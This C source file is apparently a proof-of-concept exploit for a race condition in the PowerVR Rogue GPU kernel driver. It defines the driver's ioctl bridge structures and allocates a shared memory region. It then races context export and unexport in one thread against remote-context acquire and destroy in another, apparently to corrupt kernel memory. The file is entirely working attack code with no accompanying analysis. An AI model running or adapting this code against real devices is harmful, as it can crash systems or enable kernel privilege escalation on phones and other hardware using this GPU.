#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <sched.h>
#include <unistd.h>
#include <assert.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <sys/ioctl.h>

#define __packed __attribute__((packed))

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

// tell the scheduler to pin a task to a specific CPU core
static void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
static void pin_to(int cpu) { pin_task_to(0, cpu); }

static int gpu_fd;

#define DRM_IOCTL_PVR_SRVKM_INIT 0x40046445
#define PVR_SRVKM_SERVICES_INIT  1
#define PVR_SRVKM_SYNC_INIT 2
struct drm_pvr_srvkm_init_data {
	uint32_t init_module;
};
static void srvkm_init(void) {
  struct drm_pvr_srvkm_init_data data = { .init_module = PVR_SRVKM_SERVICES_INIT };
  SYSCHK(ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_INIT, &data));
}


struct drm_pvr_srvkm_cmd {
  uint32_t bridge_id;
  uint32_t bridge_func_id;
  uint64_t in_data_ptr;
  uint64_t out_data_ptr;
  uint32_t in_data_size;
  uint32_t out_data_size;
};
#define DRM_IOCTL_PVR_SRVKM_CMD  0xc0206440

static int driver_cmd(int bridge_id, int bridge_func_id, void *in_data, void *out_data, int in_size, int out_size) {
  struct drm_pvr_srvkm_cmd cmd = {
    .bridge_id = bridge_id,
    .bridge_func_id = bridge_func_id,
    .in_data_ptr = (unsigned long)in_data,
    .out_data_ptr = (unsigned long)out_data,
    .in_data_size = in_size,
    .out_data_size = out_size
  };
  return ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_CMD, &cmd);
}
#define do_driver_cmd_noerror(bridge_id, bridge_func_id) ({                                \
    SYSCHK(driver_cmd((bridge_id), (bridge_func_id), &in, &out, sizeof(in), sizeof(out))); \
})
#define do_driver_cmd(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) errx(1, #bridge_func_id " eError %u", out.eError);                \
})

typedef void *IMG_HANDLE;
typedef int PVRSRV_ERROR;
typedef uint64_t IMG_DEV_VIRTADDR;
typedef uint64_t IMG_DEVMEM_SIZE_T;
typedef uint8_t IMG_UINT8;
typedef uint32_t IMG_UINT32;
typedef uint64_t IMG_UINT64;
typedef IMG_UINT64 PVRSRV_MEMALLOCFLAGS_T;


#define PVRSRV_BRIDGE_MM 6

#define PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE 15
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE_TAG
{
	int bbKernelMemoryCtx;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE_TAG
{
	IMG_HANDLE hDevMemServerContext;
	IMG_HANDLE hPrivData;
	int eError;
	unsigned int ui32CPUCacheLineSize;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE;

#define PVRSRV_BRIDGE_MM_DEVMEMINTCTXDESTROY 16
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTCTXDESTROY_TAG
{
	IMG_HANDLE hDevmemServerContext;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTCTXDESTROY;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTCTXDESTROY_TAG
{
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTCTXDESTROY;

#define PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR 10
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
	uint64_t uiChunkSize;
	uint64_t uiSize;
	uint32_t *pui32MappingTable;
	const char *puiAnnotation;
	uint32_t ui32AnnotationLength;
	uint32_t ui32Log2PageSize;
	uint32_t ui32NumPhysChunks;
	uint32_t ui32NumVirtChunks;
	uint32_t ui32PDumpFlags;
	uint32_t ui32PID;
	uint64_t uiFlags;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
	IMG_HANDLE hPMRPtr;
	int eError;
  PVRSRV_MEMALLOCFLAGS_T uiOutFlags;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR;

#define PVRSRV_BRIDGE_CMM 8

#define PVRSRV_BRIDGE_CMM_DEVMEMINTEXPORTCTX 0
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTEXPORTCTX_TAG
{
	IMG_HANDLE hContext;
	IMG_HANDLE hPMR;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTEXPORTCTX;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTEXPORTCTX_TAG
{
	IMG_HANDLE hContextExport;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTEXPORTCTX;

#define PVRSRV_BRIDGE_CMM_DEVMEMINTUNEXPORTCTX 1
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTUNEXPORTCTX_TAG
{
	IMG_HANDLE hContextExport;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTUNEXPORTCTX;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTUNEXPORTCTX_TAG
{
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTUNEXPORTCTX;

#define PVRSRV_BRIDGE_CMM_DEVMEMINTACQUIREREMOTECTX 2
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTACQUIREREMOTECTX_TAG
{
	IMG_HANDLE hPMR;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTACQUIREREMOTECTX;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTACQUIREREMOTECTX_TAG
{
	IMG_HANDLE hContext;
	IMG_HANDLE hPrivData;
	PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTACQUIREREMOTECTX;


static IMG_HANDLE create_device_memory_context() {
  PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE in = { .bbKernelMemoryCtx = false };
  PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE);
  return out.hDevMemServerContext;
}

static void destroy_device_memory_context(IMG_HANDLE ctx) {
  PVRSRV_BRIDGE_IN_DEVMEMINTCTXDESTROY in = { .hDevmemServerContext = ctx };
  PVRSRV_BRIDGE_OUT_DEVMEMINTCTXDESTROY out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTCTXDESTROY);
}

// non-sparse, locked
static IMG_HANDLE alloc_pmr(uint64_t alloc_size) {
  uint32_t mapping_table[1] = { 0 }; // virtual chunk idx by physical chunk idx ?
  uint64_t heap_idx = 1; // cpu-local
  uint64_t cpu_cache_mode = 2; // cache-coherent with snoop if supported
  uint64_t gpu_cache_mode = 2; // cache-coherent with snoop if supported
  PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR in = {
    .uiChunkSize = alloc_size,
    .uiSize = alloc_size,
    .pui32MappingTable = mapping_table,
    .puiAnnotation = "foobar",
    .ui32AnnotationLength = 7,
    .ui32Log2PageSize = 12,
    .ui32NumPhysChunks = 1, // ?
    .ui32NumVirtChunks = 1,
    .ui32PDumpFlags = 0,
    .ui32PID = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | 0xf0/*CPU RW, remap ok*/ | (gpu_cache_mode << 8) | (cpu_cache_mode << 11) |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) | (/*cache clean*/1<<19) |
               (/*zero backing*/0<<20) | (/*zero on alloc*/0ULL<<31) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR);
  return out.hPMRPtr;
}

static IMG_HANDLE export_ctx(IMG_HANDLE ctx, IMG_HANDLE pmr) {
  PVRSRV_BRIDGE_IN_DEVMEMINTEXPORTCTX in = { .hContext = ctx, .hPMR = pmr };
  PVRSRV_BRIDGE_OUT_DEVMEMINTEXPORTCTX out;
  do_driver_cmd(PVRSRV_BRIDGE_CMM, PVRSRV_BRIDGE_CMM_DEVMEMINTEXPORTCTX);
  return out.hContextExport;
}

static void unexport(IMG_HANDLE export) {
  PVRSRV_BRIDGE_IN_DEVMEMINTUNEXPORTCTX in = { .hContextExport = export };
  PVRSRV_BRIDGE_OUT_DEVMEMINTUNEXPORTCTX out;
  do_driver_cmd(PVRSRV_BRIDGE_CMM, PVRSRV_BRIDGE_CMM_DEVMEMINTUNEXPORTCTX);
}

static volatile int race_begin = 0;
static IMG_HANDLE shared_pmr;
static void *thread_fn(void *dummy) {
  while (1) {
    while (!race_begin) usleep(1);
    /* RACE BEGINS */
    PVRSRV_BRIDGE_IN_DEVMEMINTACQUIREREMOTECTX in = { .hPMR = shared_pmr };
    PVRSRV_BRIDGE_OUT_DEVMEMINTACQUIREREMOTECTX out;
    do_driver_cmd_noerror(PVRSRV_BRIDGE_CMM, PVRSRV_BRIDGE_CMM_DEVMEMINTACQUIREREMOTECTX);
    if (out.eError == 0) {
      destroy_device_memory_context(out.hContext);
    }
    /* RACE ENDS */
    race_begin = 0;
  }
}

int main(void) {
  sync();
  pin_to(0);
  setbuf(stdout, NULL);

  gpu_fd = SYSCHK(open("/dev/dri/by-path/platform-pvr-rogue.1.auto-card", O_RDWR));
  srvkm_init();
  shared_pmr = alloc_pmr(0x1000);

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    errx(1, "pthread_create");

  while (1) {
    IMG_HANDLE mem_ctx = create_device_memory_context();
    IMG_HANDLE export = export_ctx(mem_ctx, shared_pmr);
    destroy_device_memory_context(mem_ctx);

    race_begin = 1;
    /* RACE BEGINS */
    unexport(export);
    /* RACE ENDS */
    while (race_begin == 1) /*spin*/;
  }
}
